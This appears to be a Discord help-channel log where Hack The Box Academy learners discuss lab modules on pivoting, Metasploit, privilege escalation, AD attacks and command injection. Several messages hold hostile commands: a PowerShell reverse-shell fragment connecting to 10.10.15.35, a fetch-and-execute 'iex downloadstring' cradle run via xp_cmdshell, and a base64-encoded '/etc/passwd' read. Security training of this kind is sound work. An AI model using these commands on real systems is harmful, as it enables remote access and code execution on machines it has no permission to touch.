zinc sentinel
#

dm?

vagrant gust
#

sure

rustic sage
zinc sentinel
vital adder
#

that should work but if it doesn't then a trick you can use is you can actually use the installed chisel binary on your kali as portable binary on your target machine

rustic sage
vital adder
#

no idea but there is some stuff about the arm version need some library that targets machine on HTB doesn't have installed

#

why would you need to get root? the goal of the lab is getting the flag in that zip file

rustic sage
vital adder
#

and you do have the -v tag on your chisel server right?

rustic sage
#

yup

#

maybe its bc of the version?

vital adder
#

i'm thinking the same could be the version

#

or try with socks5 on your chisel client

rustic sage
#

maybe try reverse proxying?

heady tusk
#

while it is not displayed, it's still port 1080

#

but yes, likely the version

rustic sage
#

but when i add it to proxychains4.conf and try RDP'ng into the DC it does not work

heady tusk
#

hmm interesting. I believe I simply used port 1080 and it worked

vital adder
#

yea you could be on port 1080 because that's the default port for this or you could try set the port manually with 1080:socks

heady tusk
#

your screenshot uses port 9050, no?

rustic sage
#

yeah saw it too, weird

#

in my proxychains4.conf there is only socks5 127.0.0.1 1080 though

#

got it.....

#

proxychains4 uses proxychains.conf ?????? not proxychains4.conf???

heady tusk
#

umm that'd be kinda stupid but not impossible

naive field
#

im doing login brute force module

#

oh nvm its giving me false positives for some reason..

#

this is the cmd i used

zinc sentinel
naive field
#

delete the command?

#

idk what is wrong here tbh..

zinc sentinel
naive field
naive field
zinc sentinel
#

Nice ๐Ÿ’ช

broken warren
#

I need help with the broken auth skill assessment I've altered session ID's I've tried narrowing down my wordlist and Brute forcing sending one request every 10 seconds. Ive tried altering session ID's AND changing my user agent in the same request, but i keep getting the same error, and i'm not sure why.

polar geyser
#

hello i am stuck on USING THE METASPLOIT FRAMEWORK MSF Components Modules qustions when i tru to use my wokstation and use metasplit and use the EternalRomance and run but it show Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. what should i do and wrong?

rustic sage
#

Uhh? Is it normal that module/115/section/1124 box goes to https instead of http?

#

It keeps redirecting to HTTPS

#

Which makes me unable to go to the webpage

#

It's strange, because in the pervious part it did work ๐Ÿ˜›

#

Restarting the machine, hopefully it works.

#

Ok it works now. Strange bug, anyone knows why it does this?
Now I am curious what the problem was ๐Ÿ™‚

zinc sentinel
rustic sage
vivid magnet
#

Hi guys, attempting to do a Academy lab/exercise with Bloodhound however the tagets for attacks have changed. Resetting the "Target" machine does nothing. Any way to reset the other machines that are targets I can go after?

acoustic owl
vivid magnet
#

the table showing the attack methods are different when I run the lab...something must be broken on the reset.

acoustic owl
#

I don't know if anything has been changed in the labs.
If you tell me the module and the section, maybe I can help you and give you a hint how I solved it.

vivid magnet
#

ahhhh damn it, i know whats up. I read /typed something wrong

#

All is good, thanks guys! #needmorecoffee

sleek epoch
#

Hey guys how do you deal with burnout and excecive learning?

polar geyser
#

hello i am stuck on USING THE METASPLOIT FRAMEWORK MSF Components Modules qustions when i tru to use my wokstation and use metasplit and use the EternalRomance and run but it show Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. what should i do and wrong?

zinc marsh
#

someone could help me? idk what am i doing wrong

#

should I spawn a shell?

royal ruin
#

hey guys, im currently doing "getting started" module, is anyone available for quick question?

tall birch
#

This is one of the best modules in the platform!!
Big Thanks to the ones who created it: @blissful verge and @LTNB0B

royal ruin
dire birch
#

ye

rustic sage
#
โ”€[httpd@parrot]โ”€[~/Downloads]
โ””โ”€โ”€โ•ผ $ sudo apt install freerdp2-shadow-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 libfreerdp2-2 : Depends: libwinpr2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
 libwinpr-tools2-2 : Depends: libwinpr2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.

damn it. Trying to get xfreerdp working

rustic sage
#

That worked instantly

#

Thanks man

#

been finicing with this for like half a hour

#

๐Ÿ˜„

#

what makes aptitude work ? What's the theory behind this?

acoustic owl
trail leaf
pseudo ledge
#

hi, can I dm you for some help with this module?

dire birch
#

i found other way to get a flag, did u solve it tho?

tawny abyss
golden vortex
#

Linux Local Privilege Escalation - Skills Assessment. I dont know what to do to get flag3. can someone give a nudge?

dull vortex
#

I am working through the socat redirection with a reverse shell section of the pivoting tunneling and port forwarding module. What is the best way to get the payload onto the target host(internal windows machine) for this? I used a dynamic port forward and log in via rdp with proxychains, to then use powershell to download the payload to the target, after I moved the payload to the pivot host with scp. I am sure that there are many ways to do this but I am wondering what everyone's preferred way, or what the best way might be?

trail leaf
#

inb4 madf0x says ligolo-ng

foggy light
dire birch
#

you mean

#

u found it?

fierce island
#

I could really use a nudge for AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I managed to get a shell on the SQL01 machine, but the Administrator user doesn't seem to have a Desktop folder. I tried moving mimikatz to the machine, but it won't fire.... Running low on ideas here pepekawaii

fluid kayak
fierce island
dire birch
pallid geyser
#

where is the help chat?

acoustic owl
foggy light
dire birch
#

mind if i ask you how?

valid cipher
thorn urchin
#

old conventions vs new conventions

acoustic owl
# valid cipher how comes sometimes you have to do apt-get and other times its just apt install
It's FOSS

Brief: This article explains the difference between apt and apt-get commands of Linux. It also lists some of the most commonly used apt commands that replace the older apt-get commands.

One of the noticeable new features of Ubuntu 16.04 was the โ€˜introductionโ€™ of apt command. The reality is that

#

Simply said, you can use both

valid cipher
#

ok thanks

vagrant gust
#

any reason i cant see ftp running in the attacking ftp section of attacking common services?

heady tusk
#

might not be running on default port

vagrant gust
#

nah its not running on any

#

had to refresh the ip like 3 times then it showed up

shut quest
#

I remember having issues with that one, had to bounce it a couple of times

vagrant gust
#

also i know what the user is but no matter what i use to crack the password i cant get in

#

ive tried crackmapexec for smb hydra for ftp and ssh as well as medusa

heady tusk
#

then you haven't found the right vector yet

vagrant gust
#

wdym by vector?

heady tusk
#

attack vector

vagrant gust
#

someone i dmd had used hydra to get the password

#

and it worked fine

heady tusk
#

well yes

vagrant gust
#

im using the lists in the module

heady tusk
#

you do need hydra at some point. but you need more info before

vagrant gust
#

i understand ftp isnt on the default port

#

and u need to add that

#

but other than that idk what i could be missing

heady tusk
#

well I'm pretty sure any list you have doesn't contain the password

#

keep in mind, they always try to showcase everything they taught

vagrant gust
#

ok

#

thanks

dull vortex
#

In the Pivoting, Tunneling, Port Forwarding module, Socat bind shell: I am not sure how to troubleshoot this issue with my handler, any ideas?

heady tusk
#

not sure, but I doubt socat can handle a meterpreter session

dull vortex
#

Is something with the module wrong?

#

it's the exact example they give

heady tusk
#

lemme check

heady tusk
#

ignore my comment on socat handling meterpreter, didn't quite understand how it was supposed to work. instead it looks like the meterpreter payload that you executed on the windows host is broken. how'd you generate that?

dull vortex
#

There is no LHOST in the payload options

#

and I have not executed a payload yet, I am just attempting to start the multihandler

acoustic owl
#

You set a LPORT but no LHOST?

dull vortex
#

LHOST gives an "unknown data store option"

heady tusk
dull vortex
#

these are the options

#

How often will I ever use this bind shell anyway? I remember the TCM course said that he has only used a bind shell like one time on an engagement. Do you ever use it for the rest of the course/exam?

#

I see people saying in the discord if I search this section that they just only use reverse shell

heady tusk
#

my theory as to what's going on (it's been a while, so not sure on this):
you need to execute the windows payload first, so that it listens on port 8443.
Then socat
Then multihandler

Right now multihandler sends the stage to the windows host but the windows host hasn't opened a port yet (cause no payload executed). Therefore returns connection refused which isn't a valid meterpreter session ofc

heady tusk
thorn urchin
#

bind shells are mostly for historical knowledge purposes

#

or long term persistence on a jump host that is utterly blind.

heady tusk
#

๐Ÿ˜„

thorn urchin
#

used to be a time where firewalls were not very prevalent and people didnt really track connections and using a proxy was already considered advanced stealth so there was a lot of emphasis on scrubbing IP from logs and records for stealth. In those days you'd want to have a bind shell cause you could connect it from anywhere and just not log the connection. If you used a reverse shell your IP would have to be built in somewhere and thus could expose you.

heady tusk
#

that makes a lot of sense, thanks for the clarification ๐Ÿ™‚

thorn urchin
#

As inbound firewalls and the ease of setting up a hosting server became more common, reverse shells rose up to be the dominant stealth strategy instead and became the de facto standard

soft dagger
#

i just experienced some problems with connection of my VM to openvpn, is there a problem ?

#

seasonal challange

acoustic owl
fathom pendant
whole grotto
#

Hello ! I'm stuck in the password attack module again in the hard lab. I have mounted the vhd file and i'd like to know how to crack the passphrase ? any hint pls ?

fathom pendant
whole grotto
fathom pendant
#

Try a different list

#

Perhaps it uses a weak password that can be cracked using a simpler list from seclists

whole grotto
#

owww

#

simple list fingerguns

#

i'll try

static roost
#

Did Microsoft ever patch the "vulnerability" allowing Printspoofer to work? The way I understand it is the "vulnerability" is actually just how SeImpersonate privileged accounts are intended to operate, therefor there won't actually be a patch for Printspoofer, just a CVE explaining it. I'm guessing Windows created a security patch in order to recognize the code used to exploit this privilege. Is this true? Am I on the right track here?

static roost
#

Attacking Enterprise Networks. I'm working on the reporting aspect.

fathom pendant
#

Ah well then Google is a friend

#

ยฏ_(ใƒ„)_/ยฏ

static roost
#

Not finding anything concrete on google. That's why I'm asking here.

thorn urchin
#

idr exactly but it isnt totally unusual for there to be a vulnerability with a process and get a CVE but the only patch is at most making it not default behavior

fathom pendant
#

Nope use the password lists in SecLists

#

One or more contain the answer

whole grotto
#

oups, ok

unborn shard
#

Is it risky to connect to the HTB instance via SSH from my personal operating system?

thorn urchin
#

you mean via the vpn?

unborn shard
#

No, I mean just using SSH from the terminal of my pc

#

No need for vpn to connect via ssh, as the instances have public ip

thorn urchin
#

okay well its safe because you cant

unborn shard
#

I mean, I do it all the time

thorn urchin
#

ah the docker instances?

unborn shard
#

Yes

thorn urchin
#

yeah should be relatively safe

#

id still be using a VM at least

unborn shard
#

Is there a real reason or you just use it cause you feel safer?

#

What could be compromised?

primal rover
#

I'm a newbie 2nd day basically & stuck in the module Linux FUNDAMENTALS with 0/1 instances left but it is stuck on waiting to start; I cant get it to close the instance machine who do I ask for help? It is still saying Waiting to start... after 3 hours

unborn shard
primal rover
#

Okay, TY!

earnest ginkgo
#

Hi, I am doing the module : Windows Attacks & Defense section : Print Spooler & NTLM Relaying.

In this section we use impacket-ntlmrelayx that exploits Zerologon but the course doesn't explain why it is necessary. Can someone epxlain pls ? :3
Thx

thorn urchin
#

I wouldn't worry about it too much though

unborn shard
#

It's an isolated environment, so of course the safe would be greater or equal, but I was asking why? What am I risking if I use my main system to connect to it? Cause I have sat there and thought about it, there is not much anyone could do to my system anyway is it? I might be wrong, but I think even HTB staff/sys admins who manage those instances, couldn't do much at all even if they wanted, let alone other potential malicious users

thorn urchin
#

its your gamble

#

its generally ill advised to be using your host for any sort of hacking tasks

#

its probably fine, you do you

whole grotto
#

i found the password of the vhd file in the lab hard password attack module, i tried to open it with guestmount but i think it does'nt work because i use wsl? any help

thorn urchin
#

unfortunately the answer is dont use wsl

#

wsl is extremely unreliable

whole grotto
thorn urchin
#

vm? pwnbox?

#

or its a vhd. just mount natively

whole grotto
thorny trellis
#

@sterile hawk - @surreal rain

#

hello need help

thorn urchin
thorny trellis
thorn urchin
thorny trellis
heady tusk
#

ping sweep?

#

then you need to look around the webserver a bit more

thorn urchin
#

try with other pivot tools then

#

or other scanning tools

#

ping sweeps are also usually best to do from the end host you have access to though

#

cause most tunnels cant proxy icmp

#

you can always try a connect scan sweep with nmap though. Or crackmapexec if you suspect windows hosts

#

basically you just need to try more things

trail leaf
#

Upload a statically compiled nmap binary to the jump box and scan from there

zinc marsh
trail leaf
#

Oh wait madfox said that

zinc marsh
ruby mulch
#

Hi, I am stuck in the module attack to common servers in the DNS part I do not understand what you want me to do and the truth is that I am very stuck if someone can help me.

trail leaf
#

But you could run it as any other user on the box

zinc marsh
#

ah true

#

I didnt remember

#

ty

thorn urchin
trail leaf
#

You said sweep with nmap so I thought thatโ€™s what you implied ๐Ÿคทโ€โ™‚๏ธ

zinc marsh
#

because the target machine hasn't gcc and either unzip, ||the machine is an ubuntu 20.04, which is exploitable with that script||

thorn urchin
#

not perfect but another tool in the belt

acoustic owl
proud pine
#

I haven't done the module in a while, but nc -z with a for loop works, in a pinch.

zinc marsh
#

I did it with other exploit now trying the sudo bypass, I am able to run ncdu as root, but not to get a root shell

valid cipher
#

after learning the web requests module will i be able to do anything

#

can i do labs i mean

ivory fjord
#

Hello guys.
Could anyone please help me understand what this question is asking for:
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
It is in Footprinting/DNS section https://academy.hackthebox.com/module/112/section/1069

Do they want us to find the fqdn of the nameserver?

I did go over some of the past comments about this question, but I am still having a hard time figuring out what exactly they are asking for.

Thanks!

acoustic owl
ivory fjord
#

Gotcha.
Thanks for the clarification!

vapid field
#

where the best place yall think i should start coding ?

zinc marsh
#

is the expression used to use correct? lol

zinc marsh
ivory fjord
zinc marsh
acoustic owl
ivory fjord
#

ohhhhh.
Thanks again for clarifying the issue.

vapid field
blissful drift
#

hey can i ask a question
if my ip address was leaked is it a big problem and how do i know if its leaked if anyone knows please tell me

thorn urchin
#

read #rules and #welcome to verify your account and see the rest of the server

blissful drift
#

alr thank you

blissful drift
zinc marsh
#

I can give u some pages to check

blissful drift
#

that would be great

zinc marsh
# blissful drift that would be great

IP address lookup, location, proxy detection, email tracing, IP hiding tips, blacklist check, speed test, and forums. Find, get, and show my IP address.

blissful drift
#

ah shit it says your location may be exposed

thorn urchin
#

thats normal

blissful drift
#

but is it a problem like can it do any damage other than see my location

thorn urchin
#

off topic

#

verify your account and ask in a better channel

blissful drift
#

im doing an account

zinc marsh
#

and paste it in googlew

#

if there is any info about ur ip tipsfedora

#

but yea just verify ur account and ask in the proper channel

novel matrix
#

Can we please stay on topic otherwise Iโ€™ll just hand out mutes.

thorn urchin
#

ty

gusty zinc
#

module: command injection
section: Advanced command obfuscation

Does anyone know why they are grepping for "33" in the following command?

 echo -n 'cat /etc/passwd | grep 33' | base64
thorn urchin
#

its really not important, do whatever you'd like instead basically

primal rover
#

I'm a newbie 2nd day basically & stuck in the module Linux FUNDAMENTALS with 0/1 instances left but it is stuck on waiting to start; I cant get it to close the instance machine who do I ask for help? It is still saying Waiting to start... after 3 hours

thorn urchin
#

clear cookies and refresh the page and then of nothing contact support

primal rover
#

TY

#

Clearing cookies worked!

thorn urchin
#

sweet

#

good luck learning ๐Ÿ‘

primal rover
sleek urchin
#

Can someone help on AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. , I am logged in with xp_cmdshell enabled and I have tried many times to get a powershell shell but no results, i know there is a PE technique and getting a shell, but I need to shell in the first place

sleek urchin
#

[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near 'nop'. [-] ERROR(SQL01\SQLEXPRESS): Line 1: The identifier that starts with '$client = New-Object System.Net.Sockets.TCPClient('10.10.15.35',445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0' is too long. Maximum length is 128.

tidal mango
#

what shell are you trying to use?

sleek urchin
#

powershell

tidal mango
#

are you sending a reverse shell back to your machine or the Parrot box?

sleek urchin
#

to my machine

tidal mango
#

I had to send it back to the Parrot box.

fathom pendant
#

Are you referring to pwnbox or is it a box that you jump to in that assessment

tidal mango
#

Its the attackbox they give you, not quite the same as a pwnbox

thorn urchin
#

the attack boxes they provide are usually just an old pwnbox

#

so looks different

tidal mango
#

Yeah I would imagine its pretty much the same, but I just ssh into it, no gui

tidal mango
proud pine
#

Something like:

#

powershell -c iex(new-object net.webclient).downloadstring('http://127.0.0.1/shell.ps1')

#

Then just host the rest of the code in shell.ps1, so you don't bump up against the character limit.

gusty zinc
#

module: Command Injection
Section: Advanced command obfuscation

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

I cant seem to find the solution to this - anyone able to give me a nudge on this?

sleek urchin
zinc marsh
#

Linux Privilege Escalation -- Skills Assessment

#

someone for sanity check?

thorn urchin
sleek urchin
#

SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http://10.10.15.35/shell.ps1') [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'. SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http://10.10.15.35//shell.ps1') [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'. SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http:%2F%2F10.10.15.35%2Fshell.ps1') [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '%'.

ivory tide
#

Can someone help me with Linux PrivEsc module kernel exploit? Runnign the exploit shows : version `GLIBC_2.34' not found

trail leaf
ivory tide
zinc marsh
#

my bad i thought u was in other question

trail leaf
#

To be more specific, C programs compiled on glibc 2.34 aren't entirely backwards compatible. There should be a copy of gcc on the remote machine you can use instead

zinc marsh
#

compile it and run it

#

that feeling sadglas

ivory tide
#

nvm, i got it. Thanks @zinc marsh

bold rapids
#

Yโ€™all ever redo an entire module? Iโ€™m thinking of redoing the binary exploitation module. I dunno if Iโ€™m just stupid or bad at learning. ๐Ÿ˜ข

heavy marsh
#

I went back and reread and practiced some of the NMAP stuff again. I thought I had a good deal of experience having completed the Offensive Pentesting path on Tryhackme, but I realized that HTB Academy had significantly more information and techniques compared to what I've been used to using.

#

I was told coming here from Tryhackme that the main complaint was the "wall of text" each module was comprised of, but to be honest that works for me, it just means taking notes and redoing some sections to reinforce it. Overall I think it's a great way of learning!

#

Better than not having any detail and a "read the entire man page" approach that THM pushes.

#

What works for me is taking notes in detail on what I'm reading, but then also taking key points from those notes and putting them in a cheatsheet.

#

I doubt you're stupid or bad at learning, what matters is you're putting in the effort ๐Ÿ‘

tidal mango
zinc marsh
#

just 2 more to finish the path

valid cipher
#

how long it take u

barren crystal
#

like i've used sql injection plenty of times, after doing the module finding a bunch of other ways i could of been utilizing it

heavy marsh
celest mist
#

yeah htb fills in a lot of holes

barren crystal
#

then followed up with an it degree

#

now im going through modules i know probably 75-80% of and finding so many tricks

tender shuttle
gusty zinc
tender shuttle
gusty zinc
zinc sentinel
tender shuttle
thorn urchin
# heavy marsh I was told coming here from Tryhackme that the main complaint was the "wall of t...

I have two opinions on this.

  1. walls of text just comes with the territory of hacking. Digging through unfamiliar documentation is an inevitability and as a hacker you need to be comfortable parsing relevant information out of large chunks of texts.
  2. Complaints about walls of text just often feels like people trying to make excuses for why theyre not ready to take the plunge into the deep end.
heavy marsh
thorn urchin
#

Yup, Im just engaging in classic HTB shitting on the thm wannabes

heavy marsh
#

It definitely helps with note-taking

thorn urchin
heavy marsh
thorn urchin
#

THM is good for building up confidence. Sometimes it builds up false confidence though.

winged shore
#

Have you figured this one out? I seem to be running into the same issue. I have potential working extensions and have tried them all, but something is missing. Do you mind sharing a nudge in the direction that may have helped you solve it?

autumn pilot
#

nope, this is a module above tier 0

autumn pilot
supple sparrow
#

got the flag with file read for escaping restricted shells in the Linux PrivEsc module, any hints for spawning a fully functional shell are greatly appreciated ๐Ÿ™‚

normal latch
#

can anyone assist me on this module? i've got command execution on the target, but when i submit the answer it always said wrong answer :/

autumn pilot
#

ng is not a word

rare topaz
rare topaz
# thorn urchin

Tbf thm is more diverse and "free" but more "childish" and Newbie friendly.

#

Rlly depends which one u vibing w

pulsar needle
#

How do I grep the word with inlanefreight in it?

#

Like

#

only have test1.inlanefreight.htb, admin.inlanefreight.htb and so on?

autumn pilot
#

have you tried with using awk?

thorn urchin
#

yeah you could use some funky regex but just piping to awk would be easier

regal gust
#

Never felt like so much of a noob in all of my time in infosec, but I cannot for the life of me find the right file path for the 'public exploits' section of the getting started module, and a nudge would be greatly apreshiated!

#

Tried: ||/simple-backup, /root/public_html/wp-admin/simple-backup/tools.php, /root/public_html/wp-admin/simple-backup/flag.txt, /root/wp-admin....||

#

I know the exploit works, as I got /etc/passwd as a POC

#

Ah, nevermind, I found it by slamming my head into the metaphorical wall. Not sure why that was the right path

autumn pilot
#

the file and its filepath are mentioned in the question

regal gust
#

I knew the file, it was the path that was throwing me

#

It said it was in ||the simple-backup directory in the root wordpress directory||

#

Oh, it was literally written down kek

#

This is what I get for rushing and just reading the site

frozen mesa
#

Attacking common applications:
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
Enumerate the host and find a flag.txt flag in an accessible directory.

I tried gobuster to fuzz the dirs for flag.txt but none, manually through the directories didnt work too.

I've tried every plugin name i could find (dir listing, source mainpage} but none worked or fits the discriptions of 3 words.

Anyone a helping hand for me?

wise vault
#

Hi experts

#

๐Ÿ˜€

#

i hope everyone is doing well.

#

I want to ask about vulnhub i am solving machines everyday they are easy then the hackthebox easy level machines. I tried hackthebox machines but they are hard for me, I guess I am something missing in my knowledge when i stucked anywhere.

#

Just want to start hackthebox machines before this i want to become some intermediate level.

#

Is it ok?

#

any tip or advice?

#

most welcome

placid quest
#

@wise vault start easy machines on hackthebox

dusky violet
#

Hi I am new here and can someone can help me in private message ?

placid quest
#

@dusky violet dm me

dusky violet
#

check dm

#

@placid quest

wise vault
wise vault
placid quest
#

@wise vault yes

wise vault
placid quest
#

No problem

wise vault
#

and what about bug bounty

placid quest
#

@wise vault you can do some modules on academy hackthebox for bug bounty

wise vault
#

i am learning from owasp broken web app but there is no videos to follow ?

wise vault
placid quest
#

@wise vault yes I normally use hackthebox

bold rapids
#

What yโ€™all think the next HTB certification path will be. I hope itโ€™s focused on binary exploitation

acoustic owl
bold rapids
#

Darn. Makes sense. But darn. Htb doesnโ€™t have much on binary exploitation. I think only one module. ๐Ÿ˜‚

acoustic owl
#

and two BOF Modules as well

bold rapids
#

I didnโ€™t see game hacking. Iโ€™ll do that

bold rapids
#

Huh. I gotta dig through and find the rest.

limber river
acoustic owl
limber river
acoustic owl
acoustic owl
limber river
acoustic owl
pulsar needle
#

How do I lookup the TXT records of a website

#

?

acoustic owl
pulsar needle
#

Wha

#

I thought I tried it

#

But

#

It worked now

#

lol

#

thanks

unborn shard
#

I think that is one of the basic commands you'd get to see in the "cheat sheet" if you just take a look at it, it can be useful and save loads of time

pulsar needle
#

Hhehe

acoustic owl
#

Please delete this image, it contains a flag

pulsar needle
#

SOrry

limber river
#

bro don't spoil on other students

pulsar needle
#

The flag didnt work

#

For me

#

That was my point

acoustic owl
pulsar needle
#

aaaa

#

Ok

#

Thanks

#

I made a script to scan all the zones

#

But

#

I am pretty sure the domain i posted was the right one

#

It is the only one that contains a flag

acoustic owl
pulsar needle
#

Are you

#

AAAAAAA

#

Lol

acoustic owl
heady tusk
#

I have completed the module but to this day I'm not sure how exactly I would tell the two apart. Is there a clear indication for it or just trial and error?

pulsar needle
#

maybe its ip